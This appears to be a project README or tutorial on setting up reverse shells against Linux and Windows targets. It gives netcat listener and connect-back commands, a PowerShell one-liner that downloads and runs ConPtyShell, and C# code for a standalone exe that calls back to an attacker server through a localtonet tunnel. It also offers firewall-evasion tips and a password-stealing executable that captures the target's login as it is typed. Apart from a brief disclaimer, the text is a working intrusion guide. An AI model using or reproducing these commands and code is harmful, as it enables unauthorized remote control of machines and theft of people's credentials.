Caution
This information is provided for educational purposes only and should be used ethically and responsibly. It is crucial to understand that performing hacking activities on computer systems or networks that you do not own, or without explicit, written permission from the owner, is illegal and can have severe legal consequences.
We will be using netcat and linux. I used Kali Linux.
In kali linux to listen for a port on its ip address: Run this on the server:
nc -lvnp <PORT> -sn <IPADDRESS>Both systems need to have netcat installed if both machines are linux.
Run this on the target computer:
nc /bin/bash <IPADDRESS> <PORT>Note
The port and ip address should be the same for each computer.
However in Windows, we can make the process much, much simpler.
We will use ConPtyShell as described by this github page
On the server, the command is basically the same as before, but specifically if the target system is windows, we are going to have to run on the server:
stty raw -echo; (stty size; cat) | nc -lvnp <PORT> -sn <IPADDRESS>On the windows target system, we will have to run this command:
IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp <IPADDRESS> -RemotePort <PORT>
To make things easier, I used the C# file from antonioCoco's repo and compiled it to make an exe. However, so that you don't have to run the exe from the command prompt, you can go into the actual C# file located in get_access/C#/. In the ConPtyShell.cs file, you can modify the public static class GlobalVariables to be
public static class GlobalVariables
{
public static string serverIp = "<IPADDRESS>";
public static string serverPort = "<PORT>";
}
The default ip address is 192.168.68.88 and the default port is 555.
Then using Visual Studio, compile it into an exe (standalone exe for distribution is better).
If you don't want to make firewalls suspicious use a port below 1000.
Also the powershell scripts in the ./util folder are optional to run. The exes are preferred.
In util/ there are going to be executables that you can run from the command to get an output.
Once the windows target is connected to the server, then you can run stealpassword.exe from util/getPassword to get the password (hopefully) of the target machine. Run it through the command prompt, and then once the file is executed and the user types their computer password, then you will be able to see the target's password.
Visit AntonioCoco's ConPtyShell Repo
Visit Network Chuck's Vid
antonioCoco
networkChuck
Showed until this point are the ways you can connect while being on the same network. However, I found a way to connect from anywhere. Using the website localtonet.com I created a free account and I was able to connect to my server from their service.
Note
This works for both: remote desktop control and reverse shelling.
The following is how to do it the same way I did:
You can create an account for free at the provided website.
Navigate to the downloads page and download the client that fits your server.
Since I am using Kali Linux as my server, I downloaded the zip and then unzipped it. In the unzipped directory, I ran the file ./localtonet .
When asked for your auth token, go to your localtonet dashboard and copy the auth token from there and paste it into the input.
Then, navigate to the TCP-UDP page as shown below.
There, we will create a new TCP tunnel. For the protocol, choose TCP. For the auth token, choose default token. For the server, choose the location that is closest to you. For the ip, keep it at: 127.0.0.1. For the port, choose the port that you want to listen on the local server (previously, when I was on the same network, I used port 555; this port is going to be the local port that the localtonet will forward the port requests to). For the domain type, keep it at localto.net. Then press create.
BOOM! Now what ever request you send over 127.0.0.1 (locally) at port 555, or the port that you chose (locally), it will be available to the public to connect. The traffic is also encrypted.
For netcat, on kali linux, you will use the command stty raw -echo; (stty size; cat) | nc -lvnp <PORT> -s 127.0.0.1 to listen, if the target is Windows. If the target is linux, use nc -lvnp <PORT> -s 127.0.0.1.
In get_access/C#/ConPtyShell.cs, it is recommended to add this line of code to the top to find the ip address of your server.
public static class DnsResolver
{
public static string GetFirstIpAddress(string domain)
{
var addresses = Dns.GetHostAddresses(domain);
foreach (var address in addresses)
{
if (address.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) // Only IPv4
{
return address.ToString();
}
}
return addresses.Length > 0 ? addresses[0].ToString() : null;
}
}Then replace the global variables to this:
public static class GlobalVariables
{
public static string serverIp = DnsResolver.GetFirstIpAddress("<LOCALTONETDOMAIN>");
public static string serverPort = "<SERVERPORT>";
}The server port is this:
Simply compile the script, and you will have an exe to run that will connect to your server from anywhere in the world.
In linux, the command to connect is
nc /bin/bash <LOCALTONET_DOMAIN_IPADDR> <LOCALTONET_DOMAIN_SERVER_PORT>